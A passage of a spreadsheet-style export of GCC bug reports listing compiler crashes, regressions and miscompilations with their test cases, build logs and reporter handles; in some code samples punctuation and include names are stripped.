g++ -DHAVE_CONFIG_H -I. -I. -I.. -I../dcop -I../libltdl -I../kdecore -I../kdeui -I../kio -I../kio/kio -I../kio/kfile -I/usr/local/qt/include -I/usr/X11R6/include -I/opt/kde/include -DQT_THREAD_SUPPORT -O3 -march=pentium3 -mcpu=pentium3 -D_REENTRANT -O2 -O3 -march=pentium3 -mcpu=pentium3 -fno-exceptions -fno-check-new -DQT_NO_TRANSLATION -DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST -DQT_NO_COMPAT -c kkeyserver_x11.cpp -MT kkeyserver_x11.lo -MD -MP -MF .deps/kkeyserver_x11.TPlo  -fPIC -DPIC -o .libs/kkeyserver_x11.o
kkeyserver_x11.cpp: In function `void 
   __static_initialization_and_destruction_0(int int)':
kkeyserver_x11.cpp:73: Internal compiler error in cp_expr_size at cp/cp-lang.c
   :130
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
After seeing G++ cancelling compiling the file I repeated the command manually adding the -save-temps option to produce a .ii file.
GCC was compiled with this options:
configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-java-gc=boehm --enable-objc-gc i386-linux
(I`m actually using a precompiled Debian package see Release)
I attached the file kkeyserver_x11.ii in the bzip2 file format.
I have searched the reported bugs for such an error without any result.
Greets
Peter Mrosek
Release:
3.2.1 20020830 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux user 2.4.19 #1 Tue Sep 3 23:57:50 CEST 2002 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu</t>
  </si>
  <si>
    <t>peter512</t>
  </si>
  <si>
    <t>GCC-17175</t>
  </si>
  <si>
    <t>set_exponent breaks with integer*8 exponent</t>
  </si>
  <si>
    <t>Fortran test intrinsic_set_exponent.f90 subroutine test_real8 invokes 
set_exponent with an integer*8 parameter.  set_exponent selects the specific 
version based on the precision of the real parameter but not the integer 
parameter which is assumed to be integer*4.  If the target ABI does not 
accidentally pass the integer*8 exponent parameter correctly for an integer*4 
argument the intrinsic fails because nothing forces the parameter and function 
signature to match.</t>
  </si>
  <si>
    <t>GCC-41993</t>
  </si>
  <si>
    <t>[sh] ICE in create_pre_exit at mode-switching.c:399</t>
  </si>
  <si>
    <t>Hi
When I built gnustep-base I got the following errors.
-----
mframe.m:1250: warning: cast increases required alignment of target type
mframe.m: In function 'retframe_short':
mframe.m:863: internal compiler error: in create_pre_exit at mode-switching.c:399
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [obj/mframe.m.o] Error 1
-----
And I tested following sample program with gcc HEAD of subversion.
-----
$ cat a.c 
short retframe_short (void *rframe)
{
    __builtin_return (rframe)
}
$ tools/bin/sh4-unknown-linux-gnu-gcc -c  a.c
a.c: In function 'retframe_short':
a.c:4: internal compiler error: in create_pre_exit at mode-switching.c:399
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ tools/bin/sh4-unknown-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=tools/bin/sh4-unknown-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/home/yoshii/work/gcc/tools/libexec/gcc/sh4-unknown-linux-gnu/4.5.0/lto-wrapper
Target: sh4-unknown-linux-gnu
Configured with: /var/src/gcc/configure --build=x86_64-pc-linux-gnu --target=sh4-unknown-linux-gnu --prefix=/home/yoshii/work/gcc/tools --with-sysroot=/home/yoshii/work/gcc/sysroot --with-cpu=sh4a --with-multilib-list=sh4ash4a-nofpu --disable-libgomp --disable-libmudflap --enable-incomplete_targets --enable-libssp --enable-nls --enable-shared --enable-threads=posix --enable-symvers=gnu --enable-__cxa_atexit --enable-c99 --enable-long-long --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20091109 (experimental) (GCC)
-----
Best regards
  Nobuhiro</t>
  </si>
  <si>
    <t>GCC-10328</t>
  </si>
  <si>
    <t>/tmp/ccCyBpg3.s:2283: Error: operands mismatch -- statement `casl %d1%a1(%a0)' ignored</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Linux-m68k
How-To-Repeat:
When compiling kaffe (ftp://ftp.kaffe.org/pub/kaffe/v1.0.x-production/kaffe-1.0.7.tar.gz) on linux-m68k with -O2 gcc generates above error message and fail to compile (optimize).
The released version of kaffe is set to be compiled with optimization to be -O1 and you can change it by modifing the file 'config/m68k/linux/config.frag.
This sympton also occurs with newer version of gcc.</t>
  </si>
  <si>
    <t>inaba</t>
  </si>
  <si>
    <t>GCC-49236</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: 20_util/weak_ptr/comparison/cmp_neg.cc</t>
  </si>
  <si>
    <t>On Linux/x86 revision 174445 gave
FAIL: 20_util/weak_ptr/comparison/cmp_neg.cc  (test for warnings line 633)
FAIL: 20_util/weak_ptr/comparison/cmp_neg.cc (test for excess errors)
Revision 174439 is OK.</t>
  </si>
  <si>
    <t>GCC-80084</t>
  </si>
  <si>
    <t>[7 regression] wrong code for decomposition declaration with debug iterator</t>
  </si>
  <si>
    <t>I managed to reduce to this testcase:
//----------------------------------------
#include 
#include 
struct aggr {
    std::vector::iterator val
}
void decomp(aggr arg)
{
    auto
    // fires
    assert( 
}
int main()
{
    // inlined decomp
    {
        aggr arg {}
        auto
        // fine
        assert( 
    }
    decomp(aggr {})
}
//----------------------------------
The assertion in decomp fires when the program is compiled with e.g.:
    g++-trunk -std=c++1z main.cpp -D_GLIBCXX_DEBUG
According to my bisecting this change was introduced by r245638.</t>
  </si>
  <si>
    <t>GCC-11788</t>
  </si>
  <si>
    <t>[3.4 regression] missing implicit instantiation of static member function</t>
  </si>
  <si>
    <t>Consider the following program:
------------------------------------------
template  struct A
{
    static void foo() {}
}
int main()
{
    A a
    return (int)(
}
------------------------------------------
Compiling this with mainline (since the parser merge) results
in a linker error:
/tmp/ccWTn0Bs.o: In function `main':
/tmp/ccWTn0Bs.o(.text+0x11): undefined reference to `A::foo()'
If I instantiate A::foo explicitly the code compiles.
But IMHO the explicit instantiation isn't mandated.</t>
  </si>
  <si>
    <t>GCC-47905</t>
  </si>
  <si>
    <t>[trans-mem] ipa_tm_decrement_clone_counts ICE</t>
  </si>
  <si>
    <t>Created attachment 23478
reduced testcase.
Regression caused by revision 170213
It works with r170142.
Attached a reduced testcase.
$ gcc -O0 -fgnu-tm testcase.i
testcase.i: In function Ã¢threadÃ¢:
testcase.i:11:1: internal compiler error: in ipa_tm_decrement_clone_counts at trans-mem.c:3789
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Please consider it at the highest priority since it happens with the Velox Stack.
Patrick Marlier.</t>
  </si>
  <si>
    <t>GCC-37526</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE using --combine -O2</t>
  </si>
  <si>
    <t>I get an ICE using --combine -O2:
/usr/local/encap/gcc-4.4-20080912/bin/gcc -std=gnu99 --combine -O2  leg.leg-saved.i tree-saved.i compile-saved.i
tree-saved.c: In function 'Node_print_p':
tree-saved.c:186: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
/usr/local/encap/gcc-4.4-20080912/bin/gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/usr/local/encap/gcc-4.4-20080912
Thread model: posix
gcc version 4.4.0 20080912 (experimental) (GCC)</t>
  </si>
  <si>
    <t>patrik.hagglund</t>
  </si>
  <si>
    <t>GCC-48663</t>
  </si>
  <si>
    <t>[4.7 regression] final.c:dump_basic_block_info breaks several Tru64 UNIX tests</t>
  </si>
  <si>
    <t>Between 20110408 and 20110415 several testcases on Tru64 UNIX started failing:
FAIL: gcc.dg/debug/pr29609-1.c -gstabs1 (test for excess errors)
Excess errors:
cpp: Warning: /tmp//ccPZXIff.s line 40: BLOCK is an invalid preprocessor directive and is being ignored. (baddirective)
# BLOCK 2 seq:0
--^
cpp: Warning: /tmp//ccPZXIff.s line 41: PRED is an invalid preprocessor directive and is being ignored. (baddirective)
# PRED: ENTRY (fallthru)
--^
and many more.  This is obviously caused by this patch:
2011-04-08  Xinliang David Li  
	* final.c (dump_basic_block_info): New function.
	(final): Dump basic block.
	(final_scan_insn): Remove old dump.
Please fix.
  Rainer</t>
  </si>
  <si>
    <t>GCC-18294</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in rtl_verify_flow_info during bootstrap</t>
  </si>
  <si>
    <t>I get an ICE when bootstrapping the latest GCC on ia64-hp-hpux11.20.  It dies
when compiling adjust_field_type in gengtype.c.  Attached is a small test case
to reproduce the problem.  The test case only fails in ILP32 mode (the default)
it cannot be reproduced in LP64 mode (-mlp64) and it cannot be reproduced on
IA64 Linux because that has no ILP32 mode.
Test case:
void
adjust_field_type (int x)
{
  void *params[10]
  int i
  for (i = 0 i &lt; 10 i++)
    params[i] = ((void *)0)
  for (i = 0 i &lt; 10 i++)
    if (x == 0) {
      if (params[i] != ((void *)0))
        foo (x)
    }
  return
}</t>
  </si>
  <si>
    <t>GCC-18641</t>
  </si>
  <si>
    <t>[4.0 Regression] Another ICE caused by reload of a pseudo reg into f0 for a DImode expr</t>
  </si>
  <si>
    <t>This is similar to PR/152866. In the following test case compiled with -O0
gcc-4.0 produces following patter in reload phase:
(insn 68 47 67 7 (set (reg:DI 32 f0)
        (const_int 4294967295 [0xffffffff])) 354 {*movdi_internal32} (nil)
    (nil))
This pattern cause ICE in gen_reg_rtx.
This is the usual problem. Reload decides to use a float register for a 'long long' expression a
constant in this case because this is legit. for powerpc. But ppc patterns cannot handle it.
/* Test case */
void crc()
{
    int  toread
    long long nleft
    unsigned char buf[(128 * 1024)]
    nleft = 0
    while (toread = (nleft &lt; (2147483647 * 2U + 1U)) ? nleft: (2147483647 * 2U + 1U) )
}</t>
  </si>
  <si>
    <t>GCC-69002</t>
  </si>
  <si>
    <t>C front end should warn about undefined access to atomic structure or union</t>
  </si>
  <si>
    <t>The following code currently compiles without warnings (apart from the -Wunused-but-set-parameter warning) but the standard says in 6.5.2.3/5 that this results in undefined behavior.
typedef _Atomic struct
{
  int x
} S
int
read1 (S p)
{
  return p.x
}
int
read2 (S *p)
{
  return p-&gt;x
}
void
write1 (S p int x)
{
  p.x = x
}
void
write2 (S *p int x)
{
  p-&gt;x = x
}
(Plus the same test for union instead of struct.)</t>
  </si>
  <si>
    <t>GCC-19953</t>
  </si>
  <si>
    <t>Special-case real + complex arithmetic operation (-ffast-math)</t>
  </si>
  <si>
    <t>Looking at the following piece of code:
#include 
#include 
int main()
{
    float a
    complex float bc
    foo(
    c = a*b
    return creal(c)+cimag(c)&lt;0
}
and compiling this with flag_complex_method=2 and -O3 I find
that the statement is translated to (in t65.optimized) to
  # BLOCK 0
  # PRED: ENTRY [100.0%]  (fallthruexec)
  #   aD.2211_25 = V_MAY_DEF 
  #   bD.2212_26 = V_MAY_DEF 
  foo (
  #   D.2217_11 = V_MUST_DEF 
  D.2217 = __mulsc3 (aD.2211 0.0 REALPART_EXPR  IMAGPART_EXPR
)
  return (doubleD.24) REALPART_EXPR  + (doubleD.24) IMAGPART_EXPR
 &lt; 0.0
  # SUCC: EXIT [100.0%]
This costs quite a lot of performance.  Multiplying a real number
by a complex number doesn't require any special cases so the whole
__mulsc3 machinery is not needed here.
$ gcc -v
Using built-in specs.
Target: ia64-unknown-linux-gnu
Configured with: ../gcc-4.0-20050213/configure --prefix=/home/zfkts
--enable-languages=cf95
Thread model: posix
gcc version 4.0.0 20050213 (experimental)</t>
  </si>
  <si>
    <t>GCC-54376</t>
  </si>
  <si>
    <t>incorrect complaint about redefinition</t>
  </si>
  <si>
    <t>At least I think this is a compiler problem.  I cannot see anything wrong in the libstdc++ code or in my test code.
Compiling the following code with 4.7.0 or even the current trunk version of the compiler will produce an error like this.  There is no double inclusion problem and still the line with the redefinition is exactly the same as the definition.
If you take out one of the two variable definitions and uses the error disappears which indicates the problem is that the compiler doesn't distinguish instantiations correctly.
The other pairs of instantiations also produce the same type of mistake.
In file included from /usr/lib/gcc/x86_64-redhat-linux/4.7.0/../../../../include/c++/4.7.0/random:50:0
                 from r3.cc:3:
/usr/lib/gcc/x86_64-redhat-linux/4.7.0/../../../../include/c++/4.7.0/bits/random.h: In instantiation of â€˜class std::lognormal_distributionâ€™:
r3.cc:31:39:   required from here
/usr/lib/gcc/x86_64-redhat-linux/4.7.0/../../../../include/c++/4.7.0/bits/random.h:2279:9: error: redefinition of â€˜template bool std::operator==(const std::lognormal_distribution&amp; const std::lognormal_distribution&amp;)â€™
/usr/lib/gcc/x86_64-redhat-linux/4.7.0/../../../../include/c++/4.7.0/bits/random.h:2279:9: error: â€˜template bool std::operator==(const std::lognormal_distribution&amp; const std::lognormal_distribution&amp;)â€™ previously defined here
Source:
#include 
#include 
#include 
template
void measure(const char *name size_t n E &amp;e D &amp;d)
{
  typename D::result_type arr[n]
  typename D::result_type s = 0
  for (int tries = 0 tries &lt; 100 ++tries)
    {
      e.seed(1234)
      for (size_t i = 0 i &lt; n ++i)
	arr[i] = d(e)
      for (size_t i = 0 i &lt; n ++i)
	s += arr[i]
    }
  std::cout &lt;&lt; name &lt;&lt;   &lt;&lt; n &lt;&lt;  =  &lt;&lt;   &lt;&lt; s &lt;&lt; std::endl
}
int
main(void)
{
  std::mt19937 e2
  std::lognormal_distribution d7
  std::lognormal_distribution d8
  //std::gamma_distribution d9
  //std::gamma_distribution d10
  //std::chi_squared_distribution d11
  //std::chi_squared_distribution d12
  //std::fisher_f_distribution d15
  //std::fisher_f_distribution d16
  //std::student_t_distribution d17
  //std::student_t_distribution d18
  //std::binomial_distribution d20
  //std::binomial_distribution d21
  //std::negative_binomial_distribution d24
  //std::negative_binomial_distribution d25
  //std::poisson_distribution d26
  //std::poisson_distribution d27
  for (size_t n = 10 n &lt; 100000 n *= 1.1)
    {
      measure(lognormal:32 n e2 d7)
      measure(lognormal:64 n e2 d8)
      //measure(gamma:32 n e2 d9)
      //measure(gamma:64 n e2 d10)
      //measure(chi_squared:32 n e2 d11)
      //measure(chi_squared:64 n e2 d12)
      //measure(fisher_f:32 n e2 d15)
      //measure(fisher_f:64 n e2 d16)
      //measure(student_t:32 n e2 d17)
      //measure(student_t:64 n e2 d18)
      //measure(binomial:32 n e2 d20)
      //measure(binomial:64 n e2 d21)
      //measure(negative_binomial:32 n e2 d24)
      //measure(negative_binomial:64 n e2 d25)
      //measure(poisson:32 n e2 d26)
      //measure(poisson:64 n e2 d27)
    }
}</t>
  </si>
  <si>
    <t>GCC-1727</t>
  </si>
  <si>
    <t>Invoking methods of instances created with @protocol</t>
  </si>
  <si>
    <t>When I create an instance of my protocol using the statement
@protocol(TestProtocol) I can't invoke any method of it.
I found out that the isa pointer is not set correctly.
However if I have an implementation of the protocol inside the same bundle the problem doesn't occur.
Release:
unknown
Environment:
mingw32-nt-i586</t>
  </si>
  <si>
    <t>michael.scheibler</t>
  </si>
  <si>
    <t>GCC-33133</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in try_ready at haifa-sched.c:2958 with -O2/-O3</t>
  </si>
  <si>
    <t>I'm getting the following ICE at -O3 with current SVN:
(sid)tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O3 ncpfs-ncplib.c
ncpfs-ncplib.c: In function 'newpassencrypt':
ncpfs-ncplib.c:46: warning: incompatible implicit declaration of built-in function 'memcpy'
ncpfs-ncplib.c:48: internal compiler error: in try_ready at haifa-sched.c:2958
Please submit a full bug report
...
This worked with 20070811.</t>
  </si>
  <si>
    <t>GCC-82379</t>
  </si>
  <si>
    <t>[7/8 Regression] internal_sigreturn not defined in libasan.so or libubsan.so with -mx32</t>
  </si>
  <si>
    <t>The symbol internal_sigreturn isn't defined when building for the x32 ABI on x86_64:
$ cat test.c
int main(){ return 0 }
$ gcc -mx32 -fsanitize=address -o test test.c
/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.1/../../../../libx32/libasan.so: undefined reference to `internal_sigreturn'
collect2: error: ld returned 1 exit status
$ gcc -mx32 -fsanitize=undefined -o test test.c
/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.1/../../../../libx32/libubsan.so: undefined reference to `internal_sigreturn'
collect2: error: ld returned 1 exit status
$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.1/lto-wrapper
Target: x86_64-pc-linux-gnu                                                                  
Configured with: /build/gcc-multilib/src/gcc/configure --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://www.uplinklabs.net/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --disable-libssp --disable-libstdcxx-pch --disable-libunwind-exceptions --disable-werror --enable-__cxa_atexit --enable-checking=release --enable-clocale=gnu --enable-gnu-indirect-function --enable-gnu-unique-object --enable-initfini-array --enable-install-libiberty --enable-libmpx --enable-linker-build-id --enable-lto --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-isl --with-linker-hash-style=gnu --with-multilib-list=m32m64mx32 --with-system-zlib                         
Thread model: posix                                                                          
gcc version 7.2.1 20170929 (GCC)
My GCC was built from latest in gcc-7-branch yesterday.
Defining something like this in my application does technically work but really shouldn't be necessary:
void (*internal_sigreturn)(void) = 0</t>
  </si>
  <si>
    <t>GCC-66482</t>
  </si>
  <si>
    <t>[6 Regression] ICE in gen_formal_parameter_die</t>
  </si>
  <si>
    <t>I've just built gcc from svn r224315 on x86_64-unknown-linux-gnu. I get:
$ cat x.c
void f(int p) {}
int g() {
  void f()
  g()
  return 0
}
$ ~/gcc/local/bin/gcc -g -O3 -c x.c
x.c: In function 'f':
x.c:6:1: internal compiler error: in gen_formal_parameter_die at dwarf2out.c:17995
 }
 ^
0x78f18e gen_formal_parameter_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:17994
0x7957eb gen_decl_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21491
0x78f8e3 gen_subprogram_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:19093
0x795173 gen_decl_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21402
0x7965a4 dwarf2out_decl
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21875
0x78e9fe dwarf2out_abstract_function
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:18450
0x79515d gen_decl_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21359
0x7acc5d process_scope_var
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:20960
0x7ace9b decls_for_scope
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:20988
0x7acec2 decls_for_scope
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:20999
0x7acec2 decls_for_scope
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:20999
0x78fe6f gen_subprogram_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:19160
0x795173 gen_decl_die
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21402
0x7965a4 dwarf2out_decl
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21875
0x796a1e dwarf2out_function_decl
	/home/jay/svn/gcc/trunk/gcc/dwarf2out.c:21887
0x801d3f rest_of_handle_final
	/home/jay/svn/gcc/trunk/gcc/final.c:4498
0x801d3f execute
	/home/jay/svn/gcc/trunk/gcc/final.c:4540
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>jay.foad</t>
  </si>
  <si>
    <t>GCC-58219</t>
  </si>
  <si>
    <t>[SH] mov.l insn length is wrong on SH2A</t>
  </si>
  <si>
    <t>As of rev 201282 when compiling for SH2A mov.l insn lengths are wrongly set to 4 bytes:
int test (int* x)
{
  return x[0]
}
void test (int* x int y)
{
  x[0] = y
}
__Z4testPi:
        mov.l    @r4r0 ! 6     movsi_ie/6      [length = 4]
        rts/n           ! 28    *return_i       [length = 4]
__Z4testPii:
.LFB1:
        mov.l   r5@r4  ! 7     movsi_ie/9      [length = 4]
        rts/n           ! 19    *return_i       [length = 4]
This makes it impossible for the dbr pass to put mov.l loads/stores into delay slots (on SH only 2 byte insns can be put into delay slots).</t>
  </si>
  <si>
    <t>GCC-44892</t>
  </si>
  <si>
    <t>[4.6 regression] internal error on gnat.dg/unchecked_convert5.adb</t>
  </si>
  <si>
    <t>There is another regression in gnat.dg on SPARC/PA/PPC:
  http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg00699.html
  http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg00722.html
  http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg00709.html
It is caused by the new size check on VIEW_CONVERT_EXPR.  It actually happens everywhere we just lack a testcase for little-endian.  We probably need to do something in gigi to address this.</t>
  </si>
  <si>
    <t>GCC-81529</t>
  </si>
  <si>
    <t>[8 Regression] ICE in vectorizable_induction at tree-vect-loop.c:6613</t>
  </si>
  <si>
    <t>Starting from Richi's r250382 I see ICE on cross-compiler:
$ ./xgcc -B. /home/marxin/Programming/gcc/gcc/testsuite/gfortran.dg/pr80494.f90 -fno-tree-scev-cprop -Ofast -c
during GIMPLE pass: vect
/home/marxin/Programming/gcc/gcc/testsuite/gfortran.dg/pr80494.f90:4:0:
 subroutine CalcCgr(Crmaxordgr_max)
internal compiler error: in vectorizable_induction at tree-vect-loop.c:6613
0x12aac62 vectorizable_induction(gimple* gimple_stmt_iterator* gimple** _slp_tree*)
	../../gcc/tree-vect-loop.c:6613
0x129e3a5 vect_analyze_loop_operations
	../../gcc/tree-vect-loop.c:1780
0x129ee85 vect_analyze_loop_2
	../../gcc/tree-vect-loop.c:2093
0x129fd47 vect_analyze_loop(loop* _loop_vec_info*)
	../../gcc/tree-vect-loop.c:2405
0x12c8159 vectorize_loops()
	../../gcc/tree-vectorizer.c:669
0x1189ae9 execute
	../../gcc/tree-ssa-loop.c:412</t>
  </si>
  <si>
    <t>GCC-21571</t>
  </si>
  <si>
    <t>ICE in rs6000.c with -msdata=default.</t>
  </si>
  <si>
    <t>osv@falcon$ cat test.cc
double zero
void foo() { zero = 0 }
osv@falcon$ ppc-eabi-gcc -c test.cc
osv@falcon$ ppc-eabi-gcc -v -msdata=default -c test.cc
Using built-in specs.
Target: ppc-eabi
Configured with: ../../gcc/configure --prefix=/home/osv/try/ppc-rtems/tools
--target=ppc-eabi --disable-haifa --disable-newlib-hw-fp --with-gnu-as
--with-gnu-ld -with-newlib --with-cpu=505
Thread model: single
gcc version 4.0.1 20050513 (prerelease)
 /home/osv/try/ppc-rtems/tools/libexec/gcc/ppc-eabi/4.0.1/cc1plus -quiet -v
test.cc -quiet -dumpbase test.cc -msdata=default -mcpu=505 -auxbase test
-version -o /tmp/cc4MGHes.s
ignoring nonexistent directory
/home/osv/try/ppc-rtems/tools/lib/gcc/ppc-eabi/4.0.1/../../../../ppc-eabi/sys-include
#include ... search starts here:
#include  search starts here:
 /home/osv/try/ppc-rtems/tools/lib/gcc/ppc-eabi/4.0.1/../../../../include/c++/4.0.1
 /home/osv/try/ppc-rtems/tools/lib/gcc/ppc-eabi/4.0.1/../../../../include/c++/4.0.1/ppc-eabi
 /home/osv/try/ppc-rtems/tools/lib/gcc/ppc-eabi/4.0.1/../../../../include/c++/4.0.1/backward
 /home/osv/try/ppc-rtems/tools/lib/gcc/ppc-eabi/4.0.1/include
 /home/osv/try/ppc-rtems/tools/lib/gcc/ppc-eabi/4.0.1/../../../../ppc-eabi/include
End of search list.
GNU C++ version 4.0.1 20050513 (prerelease) (ppc-eabi)
	compiled by GNU C version 2.95.4 20011002 (Debian prerelease).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64501
test.cc: In function 'void foo()':
test.cc:2: internal compiler error: in find_addr_reg at
config/rs6000/rs6000.c:17603
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
osv@falcon$</t>
  </si>
  <si>
    <t>osv</t>
  </si>
  <si>
    <t>GCC-4600</t>
  </si>
  <si>
    <t>gcc 2.95.2 dies after reporing source code errors</t>
  </si>
  <si>
    <t>audrey:/var/www/support/src# gcc -v -save-temps -O -c -i486   -Wall  format.c 
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.2/specs
gcc version 2.95.2 20000220 (Debian GNU/Linux)
 /usr/lib/gcc-lib/i386-linux/2.95.2/cpp -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=95 -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__OPTIMIZE__ -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -i486 format.c format.i
GNU CPP version 2.95.2 20000220 (Debian GNU/Linux) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-linux/2.95.2/../../../../include/g++-3
 /usr/lib/gcc-lib/i386-linux/2.95.2/../../../../i386-linux/include
End of omitted list.
format.c:367: warning: `#ifdef' argument starts with a digit
format.c:464: unterminated macro call
format.c:642: unterminated string or character constant
format.c:157: possible real start of unterminated constant
format.c:642: unterminated character constant
cpp: Internal compiler error in `rescan' at /home/swt/doko/export/packages/gcc/gcc-2.95.2/src/gcc/cccp.c:3162
Please submit a full bug report.
See  for instructions.
Release:
gcc 2.95.2
Environment:
Debian 2.2 Linux 2.2.19 SMP libc 2.1.3
How-To-Repeat:
* gcc -v -save-temps *with* -O flag (the output above) produces a zero-byte .i file
* gcc -E and then compiling the output of gcc -E doesn't reproduce the problem
because of this the format.i file included is actually the output of the command in the description without the -O flag
I'm not sure what flags were used to build gcc I'm using the debian package.</t>
  </si>
  <si>
    <t>GCC-57682</t>
  </si>
  <si>
    <t>Uniform initialization syntax rejected in function-try-block</t>
  </si>
  <si>
    <t>Created attachment 30342
Source file demonstrating issue
Compiling via:
  g++-mp-4.9 -std=gnu++1y -c bug.cc 
Using version:
  g++-mp-4.9 (MacPorts gcc49 4.9-20130616_0) 4.9.0 20130616 (experimental)
Using paren's to initialize a data member will compile successfully but using braces in their place produces a diagnostic.  Define/undefine the OOPS macro in the attachment to reproduce failure/success.</t>
  </si>
  <si>
    <t>GCC-12774</t>
  </si>
  <si>
    <t>[3.4 Regression] Type checking problems in templates</t>
  </si>
  <si>
    <t>The following example code demonstrates a mainline regression from atleast 3.2.x.
void Foo(double r[3][3])
{
}
void Baz()
{
   double m[3][3]
   Foo(m)
}
template 
void Bar()
{
   double m[3][3]
   Foo(m)
}
int main()
{
   Baz()
   Bar()
   return 0
}
This example contains two seemling identical calls to Foo.  The first from
a normal function Baz compiles without a problem the second call from
within a template Bar however results in the error message:
bob.cpp: In function `void Bar()':
bob.cpp:15: error: cannot convert `double (*)[3]' to `double (*)[3]' in argument
 passing
This is with 3.4 20031024 (experimental) with or without any additional flags.</t>
  </si>
  <si>
    <t>GCC-82007</t>
  </si>
  <si>
    <t>DTIO write format stored in a string leads to severe errors</t>
  </si>
  <si>
    <t>Created attachment 42061
Source file of dtio_bug_1.f90
Many tests of the DTIO feature (in .../gcc/testsuite/gfortran.dg/dtio_*.f90) use inline format like in:
   write( unit=10 fmt=(DT'zeroth') iostat=myiostat iomsg=astring) member
When I attempted to put the DTIO format string (DT'zeroth') in a character string I got many kinds of error from ICE (Internal Compiler Error) to bad execution.
See the attached file (which comes from the Gfortran testsuite dtio_1.f90 simplified as much as possible) : dtio_bug_1.f90
According the length of the character string it may lead to some errors. I think the bug is related to how is read the DTIO format string.
The bug occurs either from GCC-7.2 compiled by myself on Ubuntu-16.10 either from GCC-7.2 packaged in Ubuntu-17.10.
Regards
Ã‰douard</t>
  </si>
  <si>
    <t>Edouard.Canot</t>
  </si>
  <si>
    <t>GCC-55614</t>
  </si>
  <si>
    <t>[4.7 Regression] vector extensions cause movdqa to be generated for memcpy on unaligned buffer</t>
  </si>
  <si>
    <t>Created attachment 28891
Program in which memcpy() is miscompiled
When the attached program is compiled with 4.7.2 with -O2 the memcpy() is expanded to a movdqa instruction but the buffer passed is unaligned so we get a crash.
localhost:~% gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/4.7.2/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --disable-build-with-cxx --disable-build-poststage1-with-cxx --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-initfini-array --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.7.2 20120921 (Red Hat 4.7.2-2) (GCC)</t>
  </si>
  <si>
